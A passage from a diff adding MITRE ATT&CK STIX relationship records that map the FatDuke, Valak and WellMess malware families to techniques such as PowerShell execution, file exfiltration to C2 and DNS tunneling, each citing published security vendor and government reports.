"attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[FatDuke](https://attack.mitre.org/software/S0512) has been packed with junk code and strings.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--f1a70ff1-a4e7-437e-96fd-8017feea0b5a", + "type": "relationship", + "modified": "2020-10-09T16:08:00.446Z", + "created": "2020-09-24T14:20:39.252Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--54a01db0-9fab-4d5f-8209-53cef8425f4a", + "target_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[FatDuke](https://attack.mitre.org/software/S0512) can get user agent strings for the default browser from HKCU\\Software\\Classes\\http\\shell\\open\\command.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--052c54bf-b92b-4a7e-bca4-bc884437a327", + "type": "relationship", + "modified": "2020-10-09T16:08:00.451Z", + "created": "2020-09-24T14:24:34.788Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--54a01db0-9fab-4d5f-8209-53cef8425f4a", + "target_ref": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[FatDuke](https://attack.mitre.org/software/S0512) can turn itself on or off at random intervals.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--3056fa10-d4a3-4830-96b7-987b10b5ae70", + "type": "relationship", + "modified": "2020-10-09T16:08:00.483Z", + "created": "2020-09-24T14:35:41.341Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--54a01db0-9fab-4d5f-8209-53cef8425f4a", + "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[FatDuke](https://attack.mitre.org/software/S0512) can secure delete its DLL.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--8600308b-3a73-40bd-bca0-970477ca11fb", + "type": "relationship", + "modified": "2020-10-09T16:08:00.495Z", + "created": "2020-09-24T14:35:41.366Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--54a01db0-9fab-4d5f-8209-53cef8425f4a", + "target_ref": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[FatDuke](https://attack.mitre.org/software/S0512) has the ability to create a process.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--dd9826e7-45ca-4fbd-8dc5-cfadf93c0d87", + "type": "relationship", + "modified": "2020-10-09T16:08:00.517Z", + "created": "2020-09-24T14:35:41.376Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--54a01db0-9fab-4d5f-8209-53cef8425f4a", + "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[FatDuke](https://attack.mitre.org/software/S0512) has the ability to execute PowerShell scripts.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--cbb5c722-bc07-4f35-a8cd-d6e1acc839d5", + "type": "relationship", + "modified": "2020-10-09T16:08:00.537Z", + "created": "2020-09-24T14:35:41.592Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--54a01db0-9fab-4d5f-8209-53cef8425f4a", + "target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[FatDuke](https://attack.mitre.org/software/S0512) can execute via rundll32.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--b244899c-bb0a-46c0-8f38-23d867a8a8b2", + "type": "relationship", + "modified": "2020-10-09T16:08:00.584Z", + "created": "2020-09-24T14:35:41.600Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--54a01db0-9fab-4d5f-8209-53cef8425f4a", + "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[FatDuke](https://attack.mitre.org/software/S0512) can identify the MAC address on the target computer.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--3b81ee4f-c583-477f-b2e4-d1801da7bac8", + "type": "relationship", + "modified": "2020-10-09T16:08:00.601Z", + "created": "2020-09-24T14:35:41.637Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--54a01db0-9fab-4d5f-8209-53cef8425f4a", + "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[FatDuke](https://attack.mitre.org/software/S0512) can copy files and directories from a compromised host.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--96a31073-f6b7-463d-9816-d59014ba4adc", + "type": "relationship", + "modified": "2020-10-09T16:08:00.617Z", + "created": "2020-09-24T14:35:41.649Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--54a01db0-9fab-4d5f-8209-53cef8425f4a", + "target_ref": "attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[FatDuke](https://attack.mitre.org/software/S0512) can used pipes to connect machines with restricted internet access to remote machines via other infected hosts.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--733eae48-a5e2-4e82-b4a6-950c7a660e7e", + "type": "relationship", + "modified": "2020-10-09T16:08:00.629Z", + "created": "2020-09-24T15:17:32.062Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--54a01db0-9fab-4d5f-8209-53cef8425f4a", + "target_ref": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[FatDuke](https://attack.mitre.org/software/S0512) has used several C2 servers per targeted organization.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--4e2842c6-ce4c-4204-9f29-4442a1859f12", + "type": "relationship", + "modified": "2020-10-09T16:08:00.661Z", + "created": "2020-09-24T15:17:32.084Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--54a01db0-9fab-4d5f-8209-53cef8425f4a", + "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[FatDuke](https://attack.mitre.org/software/S0512) can list running processes on the localhost.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--7380936d-51af-4ee3-b729-9c56a203bdee", + "type": "relationship", + "modified": "2020-10-09T16:08:00.669Z", + "created": "2020-09-24T15:17:32.088Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--54a01db0-9fab-4d5f-8209-53cef8425f4a", + "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[FatDuke](https://attack.mitre.org/software/S0512) can enumerate directories on target machines.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--ea6a1c47-237a-4bc6-a048-9f45dd48fe02", + "type": "relationship", + "modified": "2020-10-09T16:08:00.692Z", + "created": "2020-09-24T15:17:32.114Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "external_references": [ + { + "source_name": "Unit 42 Valak July 2020", + "url": "https://unit42.paloaltonetworks.com/valak-evolution/", + "description": "Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020." + }, + { + "source_name": "Cybereason Valak May 2020", + "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye", + "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020." + } + ], + "description": "[Valak](https://attack.mitre.org/software/S0476) has downloaded a variety of modules and payloads to the compromised host, including [IcedID](https://attack.mitre.org/software/S0483) and NetSupport Manager RAT-based malware.(Citation: Unit 42 Valak July 2020)(Citation: Cybereason Valak May 2020)", + "relationship_type": "uses", + "id": "relationship--86ce6e35-bf83-4d55-a3c8-3ac2e2d2f872", + "type": "relationship", + "modified": "2020-09-25T15:49:09.209Z", + "created": "2020-09-25T15:49:09.209Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53", + "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "external_references": [ + { + "source_name": "Cybereason Valak May 2020", + "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye", + "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020." + } + ], + "description": "[Valak](https://attack.mitre.org/software/S0476) can execute JavaScript containing configuration data for establishing persistence.(Citation: Cybereason Valak May 2020)", + "relationship_type": "uses", + "id": "relationship--6be48603-8603-45dd-8423-294169ca45a6", + "type": "relationship", + "modified": "2020-10-05T20:59:07.461Z", + "created": "2020-09-25T15:49:09.218Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53", + "target_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896", + "external_references": [ + { + "source_name": "Unit 42 Valak July 2020", + "url": "https://unit42.paloaltonetworks.com/valak-evolution/", + "description": "Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020." + } + ], + "description": "[Valak](https://attack.mitre.org/software/S0476) can use the Registry for code updates and to collect credentials.(Citation: Unit 42 Valak July 2020)", + "relationship_type": "uses", + "id": "relationship--b0d3ef27-8854-486f-942b-f0cd42c8a85c", + "type": "relationship", + "modified": "2020-09-25T17:35:36.372Z", + "created": "2020-09-25T17:35:36.372Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53", + "target_ref": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433", + "external_references": [ + { + "source_name": "Unit 42 Valak July 2020", + "url": "https://unit42.paloaltonetworks.com/valak-evolution/", + "description": "Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020." + } + ], + "description": "[Valak](https://attack.mitre.org/software/S0476) can communicate over multiple C2 hosts.(Citation: Unit 42 Valak July 2020)", + "relationship_type": "uses", + "id": "relationship--495982e4-9856-4e7f-8e05-4654d67a4d62", + "type": "relationship", + "modified": "2020-09-25T17:35:36.411Z", + "created": "2020-09-25T17:35:36.411Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53", + "target_ref": "attack-pattern--84e02621-8fdf-470f-bd58-993bb6a89d91", + "external_references": [ + { + "source_name": "Unit 42 Valak July 2020", + "url": "https://unit42.paloaltonetworks.com/valak-evolution/", + "description": "Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020." + } + ], + "description": "[Valak](https://attack.mitre.org/software/S0476) can download additional modules and malware capable of using separate C2 channels.(Citation: Unit 42 Valak July 2020)", + "relationship_type": "uses", + "id": "relationship--48e3f4e2-0506-4b5c-b40c-2c6edc92b0a5", + "type": "relationship", + "modified": "2020-09-25T17:35:36.444Z", + "created": "2020-09-25T17:35:36.444Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3a4197ae-ec63-4162-907b-9a073d1157e4", + "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62", + "external_references": [ + { + "source_name": "PWC WellMess July 2020", + "url": "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html", + "description": "PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020." + } + ], + "description": "[WellMess](https://attack.mitre.org/software/S0514) can execute command line scripts received from C2.(Citation: PWC WellMess July 2020)", + "relationship_type": "uses", + "id": "relationship--90f294ee-9232-4392-9c9a-124be3f38e06", + "type": "relationship", + "modified": "2020-10-06T15:44:25.178Z", + "created": "2020-09-29T15:45:28.859Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3a4197ae-ec63-4162-907b-9a073d1157e4", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "external_references": [ + { + "source_name": "PWC WellMess July 2020", + "url": "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html", + "description": "PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020." + }, + { + "source_name": "CISA WellMess July 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b", + "description": "CISA. (2020, July 16). MAR-10296782-2.v1 \u2013 WELLMESS. Retrieved September 24, 2020." + } + ], + "description": "[WellMess](https://attack.mitre.org/software/S0514) can write files to a compromised host.(Citation: PWC WellMess July 2020)(Citation: CISA WellMess July 2020)", + "relationship_type": "uses", + "id": "relationship--6204f142-a2a7-406f-9874-af8f3bb9dca9", + "type": "relationship", + "modified": "2020-09-29T17:39:46.319Z", + "created": "2020-09-29T15:45:28.872Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3a4197ae-ec63-4162-907b-9a073d1157e4", + "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "external_references": [ + { + "source_name": "PWC WellMess July 2020", + "url": "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html", + "description": "PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020." + }, + { + "source_name": "CISA WellMess July 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b", + "description": "CISA. (2020, July 16). MAR-10296782-2.v1 \u2013 WELLMESS. Retrieved September 24, 2020." + } + ], + "description": "[WellMess](https://attack.mitre.org/software/S0514) can send files from the victim machine to C2.(Citation: PWC WellMess July 2020)(Citation: CISA WellMess July 2020)", + "relationship_type": "uses", + "id": "relationship--45eda154-7d5b-406d-b4eb-8d1ba2b79f40", + "type": "relationship", + "modified": "2020-09-29T17:39:46.331Z", + "created": "2020-09-29T15:45:28.871Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3a4197ae-ec63-4162-907b-9a073d1157e4", + "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", + "external_references": [ + { + "source_name": "PWC WellMess July 2020", + "url": "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html", + "description": "PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020." + }, + { + "source_name": "CISA WellMess July 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b", + "description": "CISA. (2020, July 16). MAR-10296782-2.v1 \u2013 WELLMESS. Retrieved September 24, 2020." + } + ], + "description": "[WellMess](https://attack.mitre.org/software/S0514) can execute PowerShell scripts received from C2.(Citation: PWC WellMess July 2020)(Citation: CISA WellMess July 2020)", + "relationship_type": "uses", + "id": "relationship--32be4e3c-fa7f-4ec5-abee-2ed631d0494a", + "type": "relationship", + "modified": "2020-10-06T15:44:25.251Z", + "created": "2020-09-29T15:45:28.863Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3a4197ae-ec63-4162-907b-9a073d1157e4", + "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", + "external_references": [ + { + "source_name": "PWC WellMess July 2020", + "url": "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html", + "description": "PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020." + }, + { + "source_name": "CISA WellMess July 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b", + "description": "CISA. (2020, July 16). MAR-10296782-2.v1 \u2013 WELLMESS. Retrieved September 24, 2020." + } + ], + "description": "[WellMess](https://attack.mitre.org/software/S0514) can identify the IP address and user domain on the target machine.(Citation: PWC WellMess July 2020)(Citation: CISA WellMess July 2020)", + "relationship_type": "uses", + "id": "relationship--b02c36d6-1027-4f11-98dc-ee4ef00a0b8b", + "type": "relationship", + "modified": "2020-09-29T17:39:46.376Z", + "created": "2020-09-29T15:45:28.900Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3a4197ae-ec63-4162-907b-9a073d1157e4", + "target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41", + "external_references": [ + { + "source_name": "PWC WellMess July 2020", + "url": "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html", + "description": "PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020." + }, + { + "source_name": "PWC WellMess C2 August 2020", + "url": "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html", + "description": "PWC. (2020, August 17). WellMess malware: analysis of its Command and Control (C2) server. Retrieved September 29, 2020." + }, + { + "source_name": "CISA WellMess July 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b", + "description": "CISA. (2020, July 16). MAR-10296782-2.v1 \u2013 WELLMESS. Retrieved September 24, 2020." + } + ], + "description": "[WellMess](https://attack.mitre.org/software/S0514) can encrypt HTTP POST data using RC6 and a dynamically generated AES key encrypted with a hard coded RSA public key.(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)(Citation: CISA WellMess July 2020)", + "relationship_type": "uses", + "id": "relationship--90ca7f0e-f0fd-47d5-9d40-8ae6d77c0897", + "type": "relationship", + "modified": "2020-10-09T15:31:13.893Z", + "created": "2020-09-29T15:45:28.902Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3a4197ae-ec63-4162-907b-9a073d1157e4", + "target_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", + "external_references": [ + { + "source_name": "PWC WellMess July 2020", + "url": "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html", + "description": "PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020." + }, + { + "source_name": "NCSC APT29 July 2020", + "url": "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf", + "description": "National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020." + } + ], + "description": "[WellMess](https://attack.mitre.org/software/S0514) has the ability to use DNS tunneling for C2 communications.(Citation: PWC WellMess July 2020)(Citation: NCSC APT29 July 2020)", + "relationship_type": "uses", + "id": "relationship--4f7ce20c-fab3-4dbd-be9f-c023d7b0bd90", + "type": "relationship", + "modified": "2020-09-29T18:54:16.250Z", + "created": "2020-09-29T15:45:28.906Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3a4197ae-ec63-4162-907b-9a073d1157e4", + "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "external_references": [ + { + "source_name": "PWC WellMess July 2020", + "url": "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html", + "description": "PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020." + }, + { + "source_name": "PWC WellMess C2 August 2020", + "url": "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html", + "description": "PWC. (2020, August 17). WellMess malware: analysis of its Command and Control (C2) server. Retrieved September 29, 2020." + }, + { + "source_name": "CISA WellMess July 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b", + "description": "CISA. (2020, July 16). MAR-10296782-2.v1 \u2013 WELLMESS. Retrieved September 24, 2020." + }, + { + "source_name": "NCSC APT29 July 2020", + "url": "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf", + "description": "National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020." + } + ], + "description": "[WellMess](https://attack.mitre.org/software/S0514) can use HTTP and HTTPS in C2 communications.(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)(Citation: CISA WellMess July 2020)(Citation: NCSC APT29 July 2020)", + "relationship_type": "uses", + "id": "relationship--eda172f0-188d-4ca6-9a10-a90786127b68", + "type": "relationship", + "modified": "2020-10-09T15:31:13.945Z", + "created": "2020-09-29T15:45:28.908Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3a4197ae-ec63-4162-907b-9a073d1157e4", + "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "external_references": [ + { + "source_name": "PWC WellMess July 2020", + "url": "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html", + "description": "PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020." + }, + { + "source_name": "CISA WellMess July 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b", + "description": "CISA. (2020, July 16). MAR-10296782-2.v1 \u2013 WELLMESS. Retrieved September 24, 2020." + } + ], + "description": "[WellMess](https://attack.mitre.org/software/S0514) can identify the computer name of a compromised host.(Citation: PWC WellMess July 2020)(Citation: CISA WellMess July 2020)", + "relationship_type": "uses", + "id": "relationship--5e967f56-9186-43d5-b748-4ee383df4174", + "type": "relationship", + "modified": "2020-09-30T14:52:09.064Z", + "created": "2020-09-29T15:45:28.911Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3a4197ae-ec63-4162-907b-9a073d1157e4", + "target_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", + "external_references": [ + { + "source_name": "PWC WellMess July 2020", + "url": "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html", + "description": "PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020." + }, + { + "source_name": "PWC WellMess C2 August 2020", + "url": "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html", + "description": "PWC. (2020, August 17). WellMess malware: analysis of its Command and Control (C2) server. Retrieved September 29, 2020." + }, + { + "source_name": "CISA WellMess July 2020", + "url": 